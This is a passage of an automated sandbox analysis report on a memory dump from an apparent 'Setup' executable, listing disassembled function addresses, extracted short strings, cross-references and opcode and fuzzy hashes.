Opcode ID: 384be544a05cf0212a790266263dbb78d5a61deebf9d02b2ab0aeb1f156eea77
Instruction ID: a7760fe49e24961c0b3c1392ec17730fa365042b32d301aeb5abddd7d7ac0e13
Opcode Fuzzy Hash: 384be544a05cf0212a790266263dbb78d5a61deebf9d02b2ab0aeb1f156eea77
Instruction Fuzzy Hash: E9B12671A0C3918AC7168F2984503ABFFE19FD7314F094A9DE8D49B382C675C90AD796

Function 00F6DD5A Relevance: 6.6, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

MN, xrefs: 00F6DDEA
pK, xrefs: 00F6DF74
O~, xrefs: 00F6DF84
q{, xrefs: 00F6DF7C
5`ab, xrefs: 00F6E048

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 5`ab$MN$O~$pK$q{
API String ID: 0-4038937531
Opcode ID: db77e357fa941e7d33d0442578188bd10af75528681f68ee881d21ee34501e2b
Instruction ID: ce088cdecf96e7c475f7710a373ce239745ec5bed73bde90a8ebab905b60129a
Opcode Fuzzy Hash: db77e357fa941e7d33d0442578188bd10af75528681f68ee881d21ee34501e2b
Instruction Fuzzy Hash: DB812075A083018BC714DF64C8A176BB7F1EFE5320F18991CE8D64B391E7B99809E356

Function 00F5AD0C Relevance: 5.4, Strings: 4, Instructions: 427COMMON

Download Yara Rule

Strings

!"6C, xrefs: 00F5AFB0, 00F5AFB7
qbU", xrefs: 00F5AEFF
+, xrefs: 00F5AFC9
!RSP, xrefs: 00F5AF07

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !"6C$!RSP$+$qbU"
API String ID: 0-828761533
Opcode ID: 1260f50ac6a2a57a08ce748d27c980efe09cc30cbcc203280ef10adf9a11e22f
Instruction ID: f6cde9826cac6e67b362c596fbc2001c1371884ad4cb58f9d87505117b94d49f
Opcode Fuzzy Hash: 1260f50ac6a2a57a08ce748d27c980efe09cc30cbcc203280ef10adf9a11e22f
Instruction Fuzzy Hash: F8D143B164C7408BD318DF75C8946ABFBE2EBD1305F188A3CE99287351DB788509CB4A

Function 00F6E0DC Relevance: 5.4, Strings: 4, Instructions: 413COMMON

Download Yara Rule

Strings

GD, xrefs: 00F6E195
EL, xrefs: 00F6E185
WO, xrefs: 00F6E18D
]xyz, xrefs: 00F6E496

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: EL$GD$WO$]xyz
API String ID: 0-4149224771
Opcode ID: fa3411b28c087caa1b9ee02d9539c3d469a08a1208c7a0a5f4e75583e8340953
Instruction ID: daadd7c082387ae29b034454126def606ab08f5b706dfc40d03cf68ecf65ee32
Opcode Fuzzy Hash: fa3411b28c087caa1b9ee02d9539c3d469a08a1208c7a0a5f4e75583e8340953
Instruction Fuzzy Hash: 15A10476908311CBD724DF28C85266BB7F1EF82320F18995DE8D88B390E738D905D79A

Function 00F7BCDC Relevance: 5.3, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

fd}e, xrefs: 00F7BD6B
eklj, xrefs: 00F7BD81
zkmq, xrefs: 00F7BD76
aF,J, xrefs: 00F7BF1B

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: aF,J$eklj$fd}e$zkmq
API String ID: 0-2764528280
Opcode ID: c166cb08329f5b04623dfd280a809af5f6211531272d416dafb3ee834af0b2e0
Instruction ID: ea1b9f80124e765cf8da6c20580f6ca45e9f473f4a6739413e3e516237742edd
Opcode Fuzzy Hash: c166cb08329f5b04623dfd280a809af5f6211531272d416dafb3ee834af0b2e0
Instruction Fuzzy Hash: 6271DDB580C3D28AE331CF248860BABBBE1AFD2310F188A5DD4D91B241D7750949DBA7

Function 00F7782C Relevance: 5.1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

Strings

~I, xrefs: 00F78009
Z[, xrefs: 00F77FFE
tA, xrefs: 00F77FF3
hij, xrefs: 00F77EEE

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: Z[$tA$~I$hij
API String ID: 0-2266829492
Opcode ID: ea79563e6d9ffba94bfa74acd0dc2774e550cb3fb8ce33989d7d795dff2d7bd2
Instruction ID: 10323135acaebdec5368cf835219970f77d0afd6959e9b772a5695489c0e750f
Opcode Fuzzy Hash: ea79563e6d9ffba94bfa74acd0dc2774e550cb3fb8ce33989d7d795dff2d7bd2
Instruction Fuzzy Hash: 1F41E1B551C3908BD734CF26881279FBBE2EBD2314F15982CE4D95B261DB3988068B47

Function 00F6A290 Relevance: 4.3, Strings: 3, Instructions: 588COMMON

Download Yara Rule

Strings

f!K#, xrefs: 00F6A61D
H%C', xrefs: 00F6A625
p-./, xrefs: 00F6A635

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: H%C'$f!K#$p-./
API String ID: 0-2974429307
Opcode ID: 5a3c13b29a2b3e16702866ae3d4ba5a4c1906d72a9a1ecbd3ccc999e87155648
Instruction ID: 2cb4cc918d6c60333204818a5ad66a8f81e5576131acc272ef41ecdb773e4926
Opcode Fuzzy Hash: 5a3c13b29a2b3e16702866ae3d4ba5a4c1906d72a9a1ecbd3ccc999e87155648
Instruction Fuzzy Hash: CDF13C72A083118BC324CF24C8816ABB7F2EFD5764F19892DE8C967354E7359D42DB46

Function 00F7D3D1 Relevance: 4.2, Strings: 3, Instructions: 482COMMON

Download Yara Rule

Strings

k, xrefs: 00F7D5CC
ORVM, xrefs: 00F7D4E6
?, xrefs: 00F7D8DC

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ?$ORVM$k
API String ID: 0-55357630
Opcode ID: fbd373faa507808f58788a0a505c1da9e6e9d065e00a1281701ccc69e3b979d2
Instruction ID: c58ab7939d935d10f4b6702e45ec0dbd7cb419a80d3cfbb00bbb55962728b8b8
Opcode Fuzzy Hash: fbd373faa507808f58788a0a505c1da9e6e9d065e00a1281701ccc69e3b979d2
Instruction Fuzzy Hash: 51F1F5319083908ED739CB3984917AABBE2AFD3314F48895ED4DD9B282C635950ADB53

Function 00F5A64C Relevance: 4.0, Strings: 3, Instructions: 278COMMON

Download Yara Rule

Strings

`, xrefs: 00F5A759
CB, xrefs: 00F5A78A
RI[Q, xrefs: 00F5A711

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: CB$RI[Q$`
API String ID: 0-2295409773
Opcode ID: c6c088c21bfa332d30505d7626a9c096663668818f15a18c66d01bff54d1147c
Instruction ID: 3214f290abdd75bf09168a7a44de6cd4324ff14bc96ef081bf46a8824a873a3c
Opcode Fuzzy Hash: c6c088c21bfa332d30505d7626a9c096663668818f15a18c66d01bff54d1147c
Instruction Fuzzy Hash: 5D7107709083918FD3168F2984A07BBBFE09F93316F18996DE8D25B341D239890ED767

Function 00F7DF2C Relevance: 4.0, Strings: 3, Instructions: 240COMMON

Download Yara Rule

Strings

hS, xrefs: 00F7E02E
], xrefs: 00F7DF76
4, xrefs: 00F7E038

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 4$]$hS
API String ID: 0-1124971902
Opcode ID: ce09a96bb01c16b6bf089250bfeced17cca153f6ab1a69a72e7040e562f64231
Instruction ID: 5cd382c3b56b1da6f827915f6cf1f8786bdc7b6eea7894c2ba5f35ef28f38a3a
Opcode Fuzzy Hash: ce09a96bb01c16b6bf089250bfeced17cca153f6ab1a69a72e7040e562f64231
Instruction Fuzzy Hash: EB71157590C3C04BD325CB3988617ABBBE19FE7320F2C98ADD4DD4B282DA74440A9B17

Function 00F683A2 Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

gfff, xrefs: 00F6853C
tu, xrefs: 00F68488
7, xrefs: 00F684E5

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff$tu
API String ID: 0-496940666
Opcode ID: bbe88fec5e0e69ebaf226319a8808b249dd267ef961dab8d8ee8f358fd57b881
Instruction ID: de2049fa99a400303858f11e24af236ee4e096d7a1cb51a289e0c88d1d4a352b
Opcode Fuzzy Hash: bbe88fec5e0e69ebaf226319a8808b249dd267ef961dab8d8ee8f358fd57b881
Instruction Fuzzy Hash: 596148B1A143528BD724CF28C8517AF77E1EBC5314F088A3DE481CB395EB78990AD785

Function 00F7482C Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

^D, xrefs: 00F749CA
iM, xrefs: 00F749B2
tz, xrefs: 00F74933, 00F74937

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ^D$iM$tz
API String ID: 0-1308588582
Opcode ID: be418bf378c91306d3eba410395231f4f206328f7a41d4ffb56c8c16cf91d891
Instruction ID: a88f6236a50e5121a82f9bb55021753c6980a8ef7843e6982466c31682f9a53f
Opcode Fuzzy Hash: be418bf378c91306d3eba410395231f4f206328f7a41d4ffb56c8c16cf91d891
Instruction Fuzzy Hash: 8051BCB054C3409FE350CF51898066ABFE1EB86624F508D6DF2D5AB251C37CD90A9F5B

Function 00F6B12C Relevance: 3.8, Strings: 2, Instructions: 1316COMMON

Download Yara Rule

Strings

FG, xrefs: 00F6B4DB
CE, xrefs: 00F6B4D3

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: FG$CE
API String ID: 0-3557296681
Opcode ID: e2e856dc5bf7e24c6acc147266234d3c967de2305a15f261b315160cc5e78bf0
Instruction ID: 0ac2ee4227df027bf56203f6928b695f7921b981920e6760572a41fb30410fc7
Opcode Fuzzy Hash: e2e856dc5bf7e24c6acc147266234d3c967de2305a15f261b315160cc5e78bf0
Instruction Fuzzy Hash: 86925575A483409BEB209F64CC9176EBBE2EBD1310F19882CE4C5C7361D779CD46AB92

Function 00F5644C Relevance: 3.3, Strings: 2, Instructions: 834COMMON

Download Yara Rule

Strings

8, xrefs: 00F56DB3
0, xrefs: 00F56DBB

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: a7d66734641d3e36a594821e561c6b2239521bb10fd44a574eda573800cb278b
Instruction ID: fb93d6333b2b6be9374bb1420e38ded7e0d4653b5d5c59c4967eb32625ca59f6
Opcode Fuzzy Hash: a7d66734641d3e36a594821e561c6b2239521bb10fd44a574eda573800cb278b
Instruction Fuzzy Hash: 987267716083409FDB14CF18C880B6BBBE1AFD8315F48892DFA998B391D775D948DB92

Function 00F76F20 Relevance: 2.9, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

ITZ), xrefs: 00F77157, 00F77167
)^2D, xrefs: 00F77338

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )^2D$ITZ)
API String ID: 0-2563508238
Opcode ID: ac5599459565b66d8551e7380319e8a0b5832253677ac1755b87bf9f69ba44be
Instruction ID: b85240633ba3dfe380c8380e2d6a0bb1026362acd18a23122dbe3cebbc5333f6
Opcode Fuzzy Hash: ac5599459565b66d8551e7380319e8a0b5832253677ac1755b87bf9f69ba44be
Instruction Fuzzy Hash: D9B17C3296C3458BC714AE688C902BAB791DF95320F19C63EE9998F395E374C909F743

Function 00F773EC Relevance: 2.9, Strings: 2, Instructions: 372COMMON

Download Yara Rule

Strings

%21&, xrefs: 00F77767
7k2?, xrefs: 00F7776F

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: %21&$7k2?
API String ID: 0-1884281822
Opcode ID: 66227034d83682becebc55fb7c46454e24ffa6e9420e40451ed16fef4ab66ec5
Instruction ID: 0fe86a6148b585eec65f0c8cb9fda032a374b7ae056c184e1fab0c6f5915868d
Opcode Fuzzy Hash: 66227034d83682becebc55fb7c46454e24ffa6e9420e40451ed16fef4ab66ec5
Instruction Fuzzy Hash: 3AB11A76A2C3048BDB18EF288C9167B77A1DB95310F19C53EE84A87391E734DD09E792

Function 00F8E00C Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

^]^_, xrefs: 00F8E1CD
"!"#, xrefs: 00F8E0CB, 00F8E165

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "!"#$^]^_
API String ID: 0-47444839
Opcode ID: 789d7801fbb448be4305c1218fb870f8c370c956875558d218d5559b23e331b5
Instruction ID: 74c98c7e1a5fef1a75e762711a87cfc0ed5d5e2b50cbc294aaf104f4203f5930
Opcode Fuzzy Hash: 789d7801fbb448be4305c1218fb870f8c370c956875558d218d5559b23e331b5
Instruction Fuzzy Hash: B2916872A083119FD718DF24C8916AFB7A2EFD9320F19853CE99647391E7319C06D792

Function 00F55B0C Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00F55B87
IEND, xrefs: 00F55EFD

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: cfd50f34b4b111bc692558c747f352226f39c852f1680d7b9b0f98d1a90aec3e
Instruction ID: 690244111b2a0b817925a2e68e9a3046bd0663fe539c8f4ac9d1bdd5884b0820
Opcode Fuzzy Hash: cfd50f34b4b111bc692558c747f352226f39c852f1680d7b9b0f98d1a90aec3e
Instruction Fuzzy Hash: F1D1DEB1908704AFEB20CF24CC5575ABBE4AB94714F14482DFE989B381D379E90CDB92

Function 00F5E638 Relevance: 2.8, Strings: 2, Instructions: 291COMMON

Download Yara Rule

Strings

I@, xrefs: 00F5E815
F^, xrefs: 00F5E80E

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: F^$I@
API String ID: 0-534856466
Opcode ID: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
Instruction ID: 3c4911de39f2c1275240ba026057a6fc0b7e5ecde07266cf7bc7faf9ee6e2c01
Opcode Fuzzy Hash: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
Instruction Fuzzy Hash: DF91F1B5604B418FD729CF25C8C0222BBA2FF9A310728D69CC9D64F75AC739E846CB54

Function 00F688DE Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

D, xrefs: 00F68C57
O, xrefs: 00F688E6

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: D$O
API String ID: 0-2673426857
Opcode ID: 567f6c4c48f4137629e781d787f02d8cd4f67ae02b060591f06839363b0c9ef2
Instruction ID: f1f8d615fdfa61a6e0d7fc5c6c111ffa92f4e102634bb6fc9179d0a901425b44
Opcode Fuzzy Hash: 567f6c4c48f4137629e781d787f02d8cd4f67ae02b060591f06839363b0c9ef2
Instruction Fuzzy Hash: D58168B0408350CFD3248F14C4A176BBBF0FF86364F095A4CE1899F2A1E7798945DB5A

Function 00F5B485 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

h]D, xrefs: 00F5B625
h]D, xrefs: 00F5B549

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: h]D$h]D
API String ID: 0-795229245
Opcode ID: df2c9d3d244a152d65878dd7051cea82ddd3c82e19eba4ece060498254321ec4
Instruction ID: fd5048987a9341372859d433dfea53d723296dcfa7ae796939b21675fec36ec3
Opcode Fuzzy Hash: df2c9d3d244a152d65878dd7051cea82ddd3c82e19eba4ece060498254321ec4
Instruction Fuzzy Hash: 4D41F67178A3404FE328DF65AC5569BB792EFD2314F0C8A3DD4D45B252C67485068B4A

Function 00F8701C Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

IL`S, xrefs: 00F870E2
EL`S, xrefs: 00F87052

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: EL`S$IL`S
API String ID: 0-835728070
Opcode ID: 49b229a82fa9b6443c9ebcba9197cf59d6845de22c2578e4d544e600f1ee7ae2
Instruction ID: ddbd33b8d63f4fe06bc25800608355cbe21607820c7cfda9ed4f6a2168a00b31
Opcode Fuzzy Hash: 49b229a82fa9b6443c9ebcba9197cf59d6845de22c2578e4d544e600f1ee7ae2
Instruction Fuzzy Hash: 68314971B5C71D0B872CBEA8DCAA27BB295E7C9720F05823DD6468B6C0E670D84563C5

Function 00F8884F Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

45, xrefs: 00F88857
1n3, xrefs: 00F888A1

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 1n3$45
API String ID: 0-3766162355
Opcode ID: 36d48fe7a16609564501297ca801abdfd53092ff14febe9b56a361aef12e21ee
Instruction ID: 3773a02bcca58607b3a8cdcdda0572768cf438f74f5fea0c9a7afd6140764acf
Opcode Fuzzy Hash: 36d48fe7a16609564501297ca801abdfd53092ff14febe9b56a361aef12e21ee
Instruction Fuzzy Hash: 8DF0E2107483409BD314EEA19891377B7A2DF96321F98D93DD18947686D73A88429B4A

Function 00F8A79C Relevance: 2.0, Strings: 1, Instructions: 718COMMON

Download Yara Rule

Strings

f, xrefs: 00F8A9DD

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: d0b34d68d3df6efbda9fc8437e7a948d6aac3e6ad22661326aed8b9a37770fea
Instruction ID: 6a6eab25de9c4d013616d3284bee1d1093d5fc24da21a5535a175ffdce2055b4
Opcode Fuzzy Hash: d0b34d68d3df6efbda9fc8437e7a948d6aac3e6ad22661326aed8b9a37770fea
Instruction Fuzzy Hash: A5125730A0C3418FE714DF25C880B6AB7E5EBC6310F298A6EE59587391D734DD06DB92

Function 00F733FC Relevance: 1.7, Strings: 1, Instructions: 481COMMON

Download Yara Rule

Strings

KL, xrefs: 00F73422

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: KL
API String ID: 0-759073162
Opcode ID: f78e050e7df1b375b928a6c63cce9ef24adb00eb06fdda9f2cd2c00e641377fd
Instruction ID: ce7635dc1b7176da35f09418348b382d1dc87d58afad9bfdbcd3f63f4e1643eb
Opcode Fuzzy Hash: f78e050e7df1b375b928a6c63cce9ef24adb00eb06fdda9f2cd2c00e641377fd
Instruction Fuzzy Hash: 5DC13872A18301ABD718DB24CC92A67B3E5EFD5320F19C42EE8C987291E378D905E753

Function 00F7B47C Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

", xrefs: 00F7B764

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: d1147688746ac9fccad603f94786fbe4cebdd8e48ee3afe1d6416b727fb0bed2
Instruction ID: 3d644042dbb5d8627fbd267e2dce727515187fe38784479d8cc7ea95f1b3cfc1
Opcode Fuzzy Hash: d1147688746ac9fccad603f94786fbe4cebdd8e48ee3afe1d6416b727fb0bed2
Instruction Fuzzy Hash: CCC1F872E083055BD715CE24C840B6AB7D96F86320F18C56FE89D8B282D734DD49E793

Function 00F6580C Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

gI, xrefs: 00F659F7

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: gI
API String ID: 0-1684346539
Opcode ID: 91881b8686042df67e6e2379ffed42cdcd2e19657a4490797ad271727e1802b7
Instruction ID: b67d1a1576968b66ffc5b63fc57a9e692c11bb75b5c27e7dc0e4ea115072449a
Opcode Fuzzy Hash: 91881b8686042df67e6e2379ffed42cdcd2e19657a4490797ad271727e1802b7
Instruction Fuzzy Hash: F07113719147158BCB249F28C8A267BB3F0FF85B24F08451CE8929B391F778E908D766

Function 00F5992C Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

rLMN, xrefs: 00F59A31

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: rLMN
API String ID: 0-1296146032
Opcode ID: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
Instruction ID: d3120b122716bf1ceecd7194f3fb51519135ce16e4eddcfb527d95ab6c1ccb3b
Opcode Fuzzy Hash: 398a0f2d3e1c1d23b7c6520c3d68cfb8c2b6022d5b9c1086113ae940e227c2de
Instruction Fuzzy Hash: 5781A033E0C32187D7189E19D88025BB7D2DBC1721F198A18CED5973A5F6B5DD0997C0

Function 00F80CCC Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

(, xrefs: 00F80E08

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 0c82f8379e64b88f35724f119d3cf2b67391bde1a13814e9a5c5f408a5e07d30
Instruction ID: 7f6ec37c20cda5348b9c1d1ec6e8490496e8f8f780f07d23c4a972c703b82b6f
Opcode Fuzzy Hash: 0c82f8379e64b88f35724f119d3cf2b67391bde1a13814e9a5c5f408a5e07d30
Instruction Fuzzy Hash: 9C812B37A49A904BD328657C4C213E6BA934BD2330F6DC76DAAF5873E5DD694C096380

Function 00F86C2C Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

&, xrefs: 00F86C4C

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: &
API String ID: 0-3390501888
Opcode ID: 0d5780fbc8d24e1e1e81f1bc3cfe6d91a4b4317c0a7e1ad3b4941d654a8b5336
Instruction ID: 82abe1797b99d3fe46e1d0b40e0ab6aa6fac784cb800843956e44aeaa31178e5
Opcode Fuzzy Hash: 0d5780fbc8d24e1e1e81f1bc3cfe6d91a4b4317c0a7e1ad3b4941d654a8b5336
Instruction Fuzzy Hash: 1B515937B993504BE314D979DC902ABBBD2E7D6220F1ECA3DC8D9D7681D5349C068392

Function 00F822FC Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

0, xrefs: 00F82352

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 05532b159bf6474b3e019f0902b2fdf49e768b932424ed923cdf3f2e63f8db18
Instruction ID: 073e1ebff0eeccfb45ca0d85a0ac7efcf4842b59a5d40c0ab1437923bd8e909d
Opcode Fuzzy Hash: 05532b159bf6474b3e019f0902b2fdf49e768b932424ed923cdf3f2e63f8db18
Instruction Fuzzy Hash: 84713933F9A9904BC368997C4C623EAB9834BD6330B2DC37EE9B19B3E5C5695C055390

Function 00F6F2FC Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

(, xrefs: 00F6F48B

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 165a8bd25a51287d61cc56abe06e0e9731a5aee266c89a6541f75a04c61fab67
Instruction ID: 5a4849bcaecf0c1282102a6e25fed67bdbc0d5cd990d1489ac25e4f22dda432c
Opcode Fuzzy Hash: 165a8bd25a51287d61cc56abe06e0e9731a5aee266c89a6541f75a04c61fab67
Instruction Fuzzy Hash: AB712623B596D04BD328897CAC623AABA934B96330F1CC77DE9F5C73D1D5598C09A341

Function 00F62F55 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

!, xrefs: 00F63056

Memory Dump Source

Source File: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: c483d85ef1919def979feee9534c80b25d71b03633a277f91076f9e9e47289f1
Instruction ID: b3a4701b870876eab53d285aef653c6ee4c10d7c5330f5595283023dd5ca928d
